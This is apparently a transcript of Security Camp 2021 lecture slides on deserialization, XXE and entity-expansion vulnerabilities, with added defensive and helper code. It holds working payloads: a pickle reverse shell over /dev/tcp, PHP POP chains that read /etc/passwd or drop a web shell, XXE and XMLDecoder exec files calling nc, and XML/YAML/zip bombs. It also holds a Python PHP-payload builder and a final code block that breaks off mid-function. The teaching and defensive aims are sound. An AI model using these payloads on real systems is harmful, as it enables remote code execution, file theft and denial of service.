
Exploring vulnerabilities that originate in well-known OSS libraries, for fun and profit (趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求) / seccamp2021-b5

@tkmru
September 19, 2021


Transcript

  1. Finding vulnerabilities with tools during development and operations
     S3 buckets are a frequent target
     - One of the AWS building blocks that is attacked most often is the S3 bucket
     - Full name: Amazon S3 (Amazon Simple Storage Service)
     - A storage service that can be used over the internet
     - An S3 bucket is a place to put data
     - It can host static files, so it also works as a web server
     - All kinds of data end up in buckets, so attackers who want that data go after them

  2. Finding vulnerabilities with tools during development and operations
     Recent incidents
     - Personal data on 123 million US households exposed through an S3 bucket misconfiguration
     - The leak came from Alteryx, a data-analytics company based in California
       https://www.trendmicro.com/vinfo/pl/security/news/virtualization-and-cloud/data-on-123-million-us-households-exposed-due-to-misconfigured-aws-s3-bucket
     - Attackers overwriting public S3 buckets with malware planted inside
     - Malware written into buckets that mistakenly allow public writes
       https://www.mcafee.com/blogs/enterprise/cloud-security/mcafee-discovers-ghostwriter-a-pervasive-aws-s3-man-in-the-middle-exposure/

  3. OWASP Top 10 (2017): the categories it lists
     - Injection
     - Broken Authentication
     - Sensitive Data Exposure
     - XML External Entities (XXE)
     - Broken Access Control
     - Security Misconfiguration
     - Cross-Site Scripting (XSS)
     - Insecure Deserialization
     - Using Components with Known Vulnerabilities
     - Insufficient Logging and Monitoring

  4. OWASP Top 10 (2021): the categories it lists
     - Broken Access Control
     - Cryptographic Failures
     - Injection
     - Insecure Design
     - Security Misconfiguration
     - Vulnerable and Outdated Components
     - Identification and Authentication Failures
     - Software and Data Integrity Failures
     - Security Logging and Monitoring Failures
     - Server-Side Request Forgery (SSRF)

  5. Serialization and deserialization in Python
     - The pickle module serializes and deserializes with pickle.dumps(), pickle.loads() and related functions
     Serialization / deserialization: the dict becomes the byte string below and back again
       {'name': 'セキュリティ・キャンプ全国大会2021 オンライン', 'year': 2021, 'place': 'online'}
       b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3\x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xbc\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05place\x94\x8c\x06online\x94u.'
     (\x8cA is SHORT_BINUNICODE with length 0x41 = 65, the UTF-8 byte length of the name; \x95k is a 107-byte FRAME)

  6. Serialization and deserialization in PHP
     - The standard functions serialize() and unserialize() serialize and deserialize
     Serialization / deserialization:
       array(
           'name'  => 'セキュリティ・キャンプ全国大会2021 オンライン',
           'year'  => 2021,
           'place' => 'online'
       )
       a:3:{s:4:"name";s:65:"セキュリティ・キャンプ全国大会2021 オンライン";s:4:"year";i:2021;s:5:"place";s:6:"online";}
     (s:65 is the UTF-8 byte length of the name, not its character count)

  7. Insecure deserialization: the concrete attack (Python)
     - In Python, serializing and deserializing are called pickling and unpickling
     - pickle.dumps() pickles an object
     - The magic method known to be usable for attacks is __reduce__()
     - If it returns a tuple of a callable and its arguments, unpickling calls that callable with those arguments
     - So pickle an object whose __reduce__() returns os.system() and a command, send it, and you have arbitrary code execution!

  8. Pre-course assignment / selection assignment E
     Problem statement
     - Python has a standard module called pickle. As the official pickle documentation states, deserializing untrusted values with pickle can be the cause of a vulnerability. Answer sub-questions (1) and (2) below about the reason and the attack technique.
     - Sub-question (1): Explain why this is a vulnerability (required)
     - Sub-question (2): The Python source code below contains the vulnerability described above. Using it, create a reverse shell to TCP port 1234. Have netcat listen on port 1234; once the connection is established, type commands such as ls, and if the results come back your answer is correct. (partly omitted) (required)

  9. Selection assignment E: the problem code
       #!/usr/bin/env python3
       # coding: UTF-8
       import sys
       import base64
       import pickle

       args = sys.argv
       if len(args) != 2:
           print('Specify a Base64-encoded string as the first argument')
           sys.exit(1)

       try:
           data = base64.urlsafe_b64decode(args[1])
           deserialized = pickle.loads(data)  # attacker-controlled bytes go straight into pickle.loads()
           print('deserialized: {0}'.format(deserialized))
       except:
           print('Failed to deserialize')

 10. Selection assignment E: walkthrough, payload generation
       #!/usr/bin/env python3
       # coding: UTF-8
       import pickle
       import socket
       import os
       import base64

       class GetReverseShell(object):
           def __reduce__(self):
               # unpickling calls os.system() with this command line
               return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',))

       payload = pickle.dumps(GetReverseShell())
       print(base64.urlsafe_b64encode(payload))
     (/dev/tcp is a bash feature; where /bin/sh is dash the redirection fails and the command needs to be run through bash instead)

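Two checks a practitioner would want next to the payload above, as an added example that is my code and not part of the seccamp2021-b5 deck or repository: a static opcode scan with pickletools that flags any pickle able to reach a callable, and an Unpickler whose find_class refuses every global except a short allow-list, so the os.system gadget is rejected before it runs. The Gadget class, the allow-list and the benign dict are constructed for the demonstration.

```python
import io
import os
import pickle
import pickletools

# Attacker-side gadget, the same idea as GetReverseShell above: __reduce__ tells the
# unpickler to call os.system(cmd) while loading. Nothing runs at dumps() time.
class Gadget:
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))

def make_payload(cmd):
    return pickle.dumps(Gadget(cmd))

def benign_payload():
    # Constructed sample: plain data like the slide's dict; needs no global lookup at all.
    return pickle.dumps({"name": "seccamp", "year": 2021, "place": "online"})

# Opcodes through which a pickle can reach code: GLOBAL/STACK_GLOBAL import a callable,
# REDUCE/INST/OBJ/NEWOBJ/NEWOBJ_EX call it, BUILD drives __setstate__.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}

def dangerous_opcodes(data):
    """Static triage without loading: the code-reaching opcodes the pickle uses, in order."""
    return [op.name for op, _arg, _pos in pickletools.genops(data) if op.name in CODE_OPCODES]

# Allow-list of (module, name) pairs the unpickler may resolve. Scalars, str, bytes,
# list, dict and (protocol 4) set never go through find_class, so they always load.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        # On Linux os.system pickles as posix.system; the pair is still not allowed.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def load_untrusted(data):
    """('ok', obj) or ('rejected', reason); attacker-chosen callables are never executed."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    print(dangerous_opcodes(make_payload("id")))
    print(load_untrusted(make_payload("id")))
    print(load_untrusted(benign_payload()))
```

The scan is triage only: a pickle with no GLOBAL/REDUCE family opcodes is inert data, but the presence of one is not proof of malice, because every user-defined class pickles that way. The allow-list is what actually decides; keep it to classes you would be happy to have constructed with attacker-chosen arguments.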
 11. Insecure deserialization: the attack (PHP)
     - In PHP, serialize() turns an object into a string
     - Two magic methods are well known for use in attacks:
       - __wakeup()
       - __destruct()
     - Injecting objects by passing a crafted serialized string to unserialize() is the attack technique / vulnerability called PHP Object Injection

 12. Property Oriented Programming: conceptual diagram
     [diagram: four classes, each contributing one gadget, chained left to right]
     - Fragments of code called gadgets are executed one after another to reach the final goal

 13. A PHP-specific technique
       class Example {
           private $obj;

           function __construct() {
               // some PHP code...
           }

           function __wakeup() {
               if (isset($this->obj)) return $this->obj->evaluate();
           }
       }

       class CodeSnippet {
           private $code;

           function evaluate() {
               eval($this->code);
           }
       }

       // some PHP code...
       $user_data = unserialize($_POST['data']);
     Source: https://vickieli.medium.com/diving-into-unserialize-pop-chains-… (the trailing article id is lost in the transcript)
     - The POST parameter data is passed to unserialize()
     - The magic method lives in the Example class
     - __wakeup() calls evaluate() on the obj property
     - We want to reach CodeSnippet::evaluate(), which calls eval()... we really want to run it!!!

 14. A PHP-specific technique
     (same code as slide 13, annotated: "rewrite obj to a CodeSnippet object" and "put the code to execute here")
     - Point Example's obj property at a CodeSnippet object
     - Put the code to execute into CodeSnippet's code property
     - If we can supply a serialized object that behaves this way, we are done

 15. A PHP-specific technique
     - Write PHP code that builds the serialized object and run it; the output is the attack string
       <?php
       class CodeSnippet {
           private $code = "phpinfo();";
       }

       class Example {
           private $obj;

           function __construct() {
               $this->obj = new CodeSnippet;
           }
       }

       echo serialize(new Example);
     Source: https://vickieli.medium.com/diving-into-unserialize-pop-chains-… (the trailing article id is lost in the transcript)
       $ php pop-poc.php
       O:7:"Example":1:{s:12:"\0Example\0obj";O:11:"CodeSnippet":1:{s:17:"\0CodeSnippet\0code";s:10:"phpinfo();";}}
     (the private property names contain NUL bytes, "\0Example\0obj", which a terminal does not show; the lengths 12 and 17 count them, so copy the bytes, not what you see on screen)

 16. Property Oriented Programming
     Serialized objects can be read and written by hand
       <?php
       class Seccamp {
           private $year = 0;

           public function set_year($year) {
               $this->year = $year;
           }

           public function get_year() {
               return $this->year;
           }
       }

       $object = new Seccamp();
       $object->set_year(2021);
       echo serialize($object);
     - The Seccamp class shown on the left is the running example
     - It has one member variable, year
     - It has two methods, set_year and get_year
     - set_year is called to set an integer
       $ serialize-poc.php
       O:7:"Seccamp":1:{s:13:"\0Seccamp\0year";i:2021;}

 17. Property Oriented Programming: the serialization format in detail
     - boolean: b:<value>;
     - integer: i:<value>;
     - double:  d:<value>;
     - NULL:    N;
     - string:  s:<byte length>:"<value>";
     - array:   a:<count>:{<key><value> pairs}
     - object (as seen in the outputs above): O:<class name length>:"<class>":<property count>:{<name><value> pairs}
     Reference: https://insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf

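The format table above is enough to write an encoder and decoder, which is the tool I would use to build and inspect POP-chain payloads instead of hand-editing strings. The following is an added example in Python, my code rather than anything from the deck or the seccamp2021-b5 repository: it serializes and parses PHP's format, keeps property names as bytes so the NUL-mangled private names stay visible, and reproduces the Example/CodeSnippet payload from slide 15 and the Level 1 payload from slide 18. Class and property names are the slides' own; everything else is constructed.

```python
from dataclasses import dataclass, field

@dataclass
class PhpObject:
    # O:<len>:"<class>":<count>:{<name><value>...}; property names are bytes so PHP's
    # mangled private/protected names survive intact.
    cls: str
    props: dict = field(default_factory=dict)

def private_prop(cls, name):
    # PHP writes a private property as "\0Class\0name", a protected one as "\0*\0name".
    # The NULs are invisible in a terminal but are counted in the s:<len> prefix.
    return b"\x00" + cls.encode() + b"\x00" + name.encode()

def protected_prop(name):
    return b"\x00*\x00" + name.encode()

def php_serialize(value):
    """Emit PHP serialize() output for None/bool/int/float/str/bytes/dict/PhpObject."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):            # bool before int: bool is a subclass of int
        return b"b:%d;" % int(value)
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return b"d:%s;" % repr(value).encode()
    if isinstance(value, str):
        value = value.encode("utf-8")
    if isinstance(value, bytes):            # the length is in bytes, not characters
        return b's:%d:"%s";' % (len(value), value)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return b'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls.encode(), len(value.props), body)
    raise TypeError(f"cannot serialize {type(value).__name__}")

def php_unserialize(data):
    """Parse PHP serialize() output back into Python values (strings come back as bytes)."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError(f"trailing data at offset {end}")
    return value

def _counted(b, i):
    # read "<number>:" starting at i; return (number, index just past the colon)
    colon = b.index(b":", i)
    return int(b[i:colon]), colon + 1

def _pairs(b, i, count):
    items = {}
    for _ in range(count):
        key, i = _parse(b, i)
        items[key], i = _parse(b, i)
    if b[i:i + 1] != b"}":
        raise ValueError(f"expected '}}' at offset {i}")
    return items, i + 1

def _parse(b, i):
    tag = b[i:i + 1]
    if tag == b"N":
        return None, i + 2
    if tag in (b"b", b"i", b"d"):
        end = b.index(b";", i)
        conv = {b"b": lambda r: bool(int(r)), b"i": int, b"d": float}[tag]
        return conv(b[i + 2:end]), end + 1
    if tag == b"s":
        n, i = _counted(b, i + 2)
        value = b[i + 1:i + 1 + n]          # skip the opening quote; slice by byte count
        if b[i + 1 + n:i + 3 + n] != b'";':
            raise ValueError(f"bad string length at offset {i}")
        return value, i + 3 + n
    if tag == b"a":
        n, i = _counted(b, i + 2)
        return _pairs(b, i + 1, n)          # skip '{'
    if tag == b"O":
        n, i = _counted(b, i + 2)
        cls = b[i + 1:i + 1 + n].decode()   # skip the opening quote
        count, i = _counted(b, i + 3 + n)   # skip the closing quote and ':'
        props, i = _pairs(b, i + 1, count)
        return PhpObject(cls, props), i
    raise ValueError(f"unknown type tag {tag!r} at offset {i}")

def pop_chain_payload(code="phpinfo();"):
    """Slide 15 chain: Example->obj is a CodeSnippet whose private code is eval()'d in __wakeup()."""
    snippet = PhpObject("CodeSnippet", {private_prop("CodeSnippet", "code"): code})
    return php_serialize(PhpObject("Example", {private_prop("Example", "obj"): snippet}))

def level1_payload(path="/etc/passwd"):
    """Slide 18 chain: Main->file is a Setting whose public path is read in __destruct()."""
    return php_serialize(PhpObject("Main", {b"file": PhpObject("Setting", {b"path": path})}))

if __name__ == "__main__":
    print(pop_chain_payload())
    print(php_unserialize(pop_chain_payload()))
```

Feed the returned bytes to the target verbatim (for example as the raw POST body, percent-encoded); pasting the printed string into a form strips the NULs and the lengths no longer match, which is the usual reason a hand-built private-property chain silently fails to unserialize.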
 18. Exercise walkthrough, Level 1
       <?php
       class Setting {
           public $path = "config.json";

           public function read() {
               $content = file_get_contents($this->path);
               echo $content;
           }
       }

       class Main {
           public $file = null;

           public function __destruct() {
               $this->file->read();
           }
       }

       $m = new Main();
       $m->file = new Setting();
       $m->file->path = "/etc/passwd";
       echo serialize($m);
     Code that generates the payload (__destruct() on Main reads whatever path Setting carries)

 19. Exercise walkthrough, Level 2
       <?php
       class Setting {
           public $path = "config.json";

           public function read() {
               system("cat " . $this->path);
           }
       }

       class Main {
           public $file = null;

           public function __destruct() {
               $this->file->read();
           }
       }

       $m = new Main();
       $m->file = new Setting();
       $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php';
       echo serialize($m);
     Code that generates the payload (path is concatenated into a shell command, so a ";" appends a command that drops a web shell)

 20. XML structure: an XML example
     - Data is expressed as a nested structure of tags
       <?xml version="1.0"?>
       <!DOCTYPE lectures [
         <!ELEMENT lectures (lecture+)>
         <!ELEMENT lecture (title,instructor,track)>
         <!ELEMENT title (#PCDATA)>
         <!ELEMENT instructor (#PCDATA)>
         <!ELEMENT track (#PCDATA)>
       ]>
       <lectures>
         <lecture id="0005">
           <title>趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求</title>
           <instructor>小竹泰一</instructor>
           <track>B</track>
         </lecture>
       </lectures>
     (annotations: the DOCTYPE block defines the content of the lectures tag; the body uses the lectures tag to record the content. The DTD declares no ATTLIST for id, so a validating parser would reject that attribute; non-validating parsers ignore the mismatch.)

 21. XML structure
     - The part that defines the elements is called the DTD (Document Type Definition)
     (same XML as slide 20, annotated: the DOCTYPE block is the DTD that defines the lectures tag)

 22. XML structure: what a DTD defines
     - The XML example above defined the elements that make up lectures and their attributes
     - A DTD can also define entities, i.e. named constants
       <?xml version="1.0"?>
       <!DOCTYPE lectures[]>

       <?xml version="1.0"?>
       <!ENTITY title "趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求">
     (the second fragment is illustrative; in a real document the ENTITY declaration sits inside the DOCTYPE brackets)

 23. XML structure: internal entities and external entities
     - Entities, the constants, come in two kinds: Internal Entity and External Entity
     - With the SYSTEM keyword a value can be fetched from a URI scheme
     - An External Entity is one whose value is fetched from outside, by giving a web page URL or a local file path
       <?xml version="1.0"?>
       <!DOCTYPE demo [
         <!ENTITY xml-file SYSTEM "http://example.com/sample.xml">
         <!ENTITY txt-file SYSTEM "file:///path/to/file.txt">
       ]>
       <demo>
         <file>&xml-file;</file>
         <file>&txt-file;</file>
       </demo>

 24. CVE (identifier lost in the transcript): an XML file that triggers XXE
     Pre-course assignment walkthrough
       <?xml version="1.0" encoding="UTF-8"?>
       <!DOCTYPE aaa [
         <!ENTITY % dtd SYSTEM "http://localhost:5000/xxe">
         %dtd;
       ]>
       <FILE_INFO>
         <BASIC_INFO>
           <STATE NAME="OWNER" TYPE="string" VALUE="tkmru" />
         </BASIC_INFO>
       </FILE_INFO>
     (the parameter entity %dtd; makes the parser fetch an attacker-hosted DTD; the fetched DTD can then declare further entities that exfiltrate data)

 25. CVE (identifier lost in the transcript): an XML file that triggers the vulnerability
     Pre-course assignment walkthrough
       <?xml version="1.0" encoding="UTF-8"?>
       <java version="11.0.9" class="java.beans.XMLDecoder">
         <object class="ghidra.bitpatterns.info.FileBitPatternInfo">
           <void property="ghidraURL">
             <string>TODO: url</string>
           </void>
           <void property="languageID">
             <string>x86:LE:64:default</string>
           </void>
           (omitted)
         <object class="java.lang.Runtime" method="getRuntime">
           <void method="exec">
             <string>nc 127.0.0.1 5000</string>
           </void>
         </object>
       </java>
     (this second file is not an entity-expansion payload: it is a java.beans.XMLDecoder document that calls Runtime.getRuntime().exec(), so the bug is XML-driven deserialization rather than XXE)

 26. Billion Laughs: example XML file
     - The well-known file uses the internet slang lol (lots of laughs)
     - Hence the name Billion Laughs: nine levels of tenfold expansion yield a billion copies of "lol"
       <?xml version="1.0"?>
       <!DOCTYPE lolz [
         <!ENTITY lol "lol">
         <!ELEMENT lolz (#PCDATA)>
         <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
         <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
         <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
         <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
         <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
         <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
         <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
         <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
         <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
       ]>
       <lolz>&lol9;</lolz>

 27. Quadratic blowup entity expansion
     - One entity (x) holding a huge string (AAAA...) is referenced many times, aiming at enormous memory consumption
     - Less efficient than Billion Laughs, whose memory use grows exponentially
     - But it slips past parser countermeasures that forbid deeply nested entities, because nothing is nested
     Example XML file:
       <?xml version="1.0"?>
       <!DOCTYPE DoS [
         <!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(omitted)">
       ]>
       <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(omitted)</DoS>

 28. Quadratic blowup entity expansion: example XML file
     - Because the payload is a huge string, it is easier to assemble the XML in code than to keep it as a literal file
       size = 55000
       entity = 'A' * size
       refs = '&x;' * size
       data = '''\
       <?xml version="1.0"?>
       <!DOCTYPE DoS [
       <!ENTITY x "{entity}">
       ]>
       <DoS>{entityReferences}</DoS>
       '''.format(entity=entity, entityReferences=refs)
     (55000 references to a 55000-byte entity expand to about 3 GB from a 220 KB document)

 29. Billion Laughs also works on YAML parsers
     - A YAML file that attempts Billion Laughs (anchors and aliases play the role of entities)
       lol1: &lol1 "lol"
       lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1]
       lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2]
       lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3]
       lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4]
       lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5]
       lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6]
       lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7]
       lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8]
       lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

 30. Billion Laughs: a real case in k8s
     - Excerpt from https://github.com/kubernetes/kubernetes/issues/… (issue number lost in the transcript)
       apiVersion: v1
       data:
         a: &a ["web","web","web","web","web","web","web","web","web"]
         b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
         c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
         d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
         e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
         f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
         g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
         h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
         i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
       kind: ConfigMap
       metadata:
         name: yaml-bomb
         namespace: default

 31. Quadratic blowup entity expansion also works on YAML parsers
     - Quadratic blowup, the relative of Billion Laughs, is just as effective
     - For some reason I could not find any literature that mentions quadratic blowup against YAML parsers 🤔
     - It should slip past parser countermeasures that forbid deeply nested entities (presumably)
     - I have not compared the countermeasures of each library, but as with XML parsers, Billion Laughs is probably neutralised while quadratic blowup still works in some libraries (probably)

 32. DTD Retrieval: another kind of XXE
     - This too is a kind of XXE
     - Because the document type can be specified with a local path or a URL, information at the specified location can be fetched
       <?xml version="1.0" encoding="utf-8"?>
       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html>
         <head/>
         <body>text</body>
       </html>

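To make the XML attacks on the preceding slides (external entity / XXE, the %dtd; fetch, Billion Laughs, quadratic blowup, DTD retrieval) concrete from the defender's side, here is an added example that is my code and not part of the deck or the seccamp2021-b5 hands-on: a parser on the standard-library xml.parsers.expat that rejects any external entity or external DTD at declaration time and aborts once entity expansion produces more than ten times the input size, which catches both the exponential and the quadratic bomb regardless of nesting depth. The sample documents are constructed for the test; the lecture document is the slide's own example and the bombs are scaled-down versions of the slides' files.

```python
from xml.parsers import expat

class UnsafeXml(Exception):
    """Raised when a document violates the parsing policy below."""

def parse_untrusted_xml(data, max_amplification=10):
    """Parse `data` (bytes) with the stdlib expat parser; return (root_tag, text).

    Policy:
      * external DTD subsets and external entities, general or parameter, are rejected
        when declared: this covers XXE, the %dtd; fetch and DTD retrieval;
      * character data may not exceed max_amplification x len(data). A document without
        entities can never exceed 1x, so only entity expansion (Billion Laughs, quadratic
        blowup) trips this, however deep or shallow the nesting.
    """
    budget = max_amplification * len(data)
    state = {"root": None, "chars": 0, "text": []}

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # never fetch %entities;

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise UnsafeXml(f"external DTD for <!DOCTYPE {name}>: {system_id!r}")

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if value is None:  # no literal value means SYSTEM/PUBLIC, i.e. an external entity
            kind = "parameter " if is_param else ""
            raise UnsafeXml(f"external {kind}entity {name!r} -> {system_id!r}")

    def external_entity_ref(context, base, system_id, public_id):
        # expat calls this to let the application fetch the entity; refuse outright.
        raise UnsafeXml(f"reference to external entity {system_id!r}")

    def start_element(name, attrs):
        if state["root"] is None:
            state["root"] = name

    def character_data(text):
        state["chars"] += len(text)
        if state["chars"] > budget:
            raise UnsafeXml(f"entity expansion exceeded {max_amplification}x the input size")
        state["text"].append(text)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = character_data
    parser.Parse(data, True)
    return state["root"], "".join(state["text"])

def check(data):
    """('ok', root_tag) or ('rejected', reason); libexpat's own limits also count as rejection."""
    try:
        root, _text = parse_untrusted_xml(data)
        return ("ok", root)
    except (UnsafeXml, expat.ExpatError) as exc:
        return ("rejected", str(exc))

# Constructed samples. LECTURE_XML is the slide's example; the rest mirror the attack slides.
LECTURE_XML = """<?xml version="1.0"?>
<!DOCTYPE lectures [
<!ELEMENT lectures (lecture+)>
<!ELEMENT lecture (title,instructor,track)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT instructor (#PCDATA)>
<!ELEMENT track (#PCDATA)>
]>
<lectures><lecture id="0005"><title>趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求</title><instructor>小竹泰一</instructor><track>B</track></lecture></lectures>
""".encode("utf-8")
XXE_XML = b'<?xml version="1.0"?><!DOCTYPE demo [<!ENTITY txt SYSTEM "file:///etc/passwd">]><demo>&txt;</demo>'
PARAM_ENTITY_XML = b'<?xml version="1.0"?><!DOCTYPE aaa [<!ENTITY % dtd SYSTEM "http://localhost:5000/xxe"> %dtd;]><aaa/>'
DTD_RETRIEVAL_XML = (b'<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
                     b'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><body>text</body></html>')

def billion_laughs(depth=5, fanout=10):
    """Scaled-down Billion Laughs: fanout**depth copies of "lol" from a few hundred bytes."""
    decls = ['<!ENTITY lol "lol">']
    for n in range(1, depth + 1):
        prev = "lol" if n == 1 else f"lol{n - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{n} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f'\n]>\n<lolz>&lol{depth};</lolz>').encode()

def quadratic_blowup(size=2000, refs=200):
    """One entity of `size` bytes referenced `refs` times: size*refs bytes of output, no nesting."""
    return ('<?xml version="1.0"?>\n<!DOCTYPE DoS [\n<!ENTITY x "{}">\n]>\n<DoS>{}</DoS>'
            .format("A" * size, "&x;" * refs)).encode()

if __name__ == "__main__":
    for name, doc in [("lecture", LECTURE_XML), ("xxe", XXE_XML), ("param", PARAM_ENTITY_XML),
                      ("dtd", DTD_RETRIEVAL_XML), ("laughs", billion_laughs()), ("quadratic", quadratic_blowup())]:
        print(name, check(doc))
```

The amplification budget is the same idea libexpat 2.4.1 and later enforce internally (there with a 100x ratio after 8 MiB), which is why check() also treats ExpatError as a rejection. Higher-level stdlib parsers (xml.sax, minidom, pulldom, as used in the hands-on) resolve external entities themselves on top of expat, so the policy must sit at the expat layer or in the SAX EntityResolver rather than be assumed from the library.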
 33. Exercise: try external entity expansion yourself (a few minutes)
     - Running each Dockerfile under the following directory makes code written against each Python XML library process an XML file that attempts external entity expansion
     - Build and run a container from the Dockerfile in each folder
       $ git clone git@github.com:tkmru/seccamp2021-b5.git
       $ cd seccamp2021-b5
       $ cd handson/xml-parser/external-entity-expansion/
       $ cd pulldom/python3.7.0
       $ docker build . -t external-entity-expansion-pulldom
       $ docker run external-entity-expansion-pulldom

 34. Decompression bomb: DoS through a compressed file
     - Send a compressed file that expands to an enormous size, aiming to exhaust disk space (or memory, if the consumer inflates into RAM)
     - XML libraries that can parse a compressed XML stream are affected
     - In Japanese it is called a high-compression file bomb or ZIP bomb
       $ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz        # bs*count = 1 GB
       $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy     # bs*count = 1 GB
       $ ls -sh zeros.*
       1020K zeros.gz   # all zeros, so the compression ratio is very high
       148K  zeros.xy   # all zeros, so the compression ratio is very high

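As an added example (my code, not from the slides or the course repository) of the check a consumer of compressed input would want: a bounded gzip decompressor built on zlib.decompressobj's max_length that stops as soon as the output exceeds a budget, plus a reader for the gzip ISIZE trailer to show why the size the file claims about itself cannot be the only check (it is attacker-controlled and wraps modulo 2^32). The bomb is constructed in-process from zeros, like the dd | gzip command above, at a smaller size.

```python
import gzip
import struct
import zlib

class DecompressionBomb(Exception):
    """Output budget exceeded while inflating."""

def gzip_isize(data):
    """ISIZE, the last 4 bytes of a gzip member: uncompressed length mod 2**32.

    Written by whoever produced the file, so it is only a hint for an early refusal,
    never a substitute for bounding the real output.
    """
    return struct.unpack("<I", data[-4:])[0]

def bounded_gunzip(data, max_output, chunk=64 * 1024):
    """Inflate one gzip member, raising DecompressionBomb as soon as output exceeds max_output.

    decompress(buf, max_length) yields at most `chunk` bytes per call and hands the unread
    input back in .unconsumed_tail, so memory stays near max_output + chunk whatever the
    stream expands to.
    """
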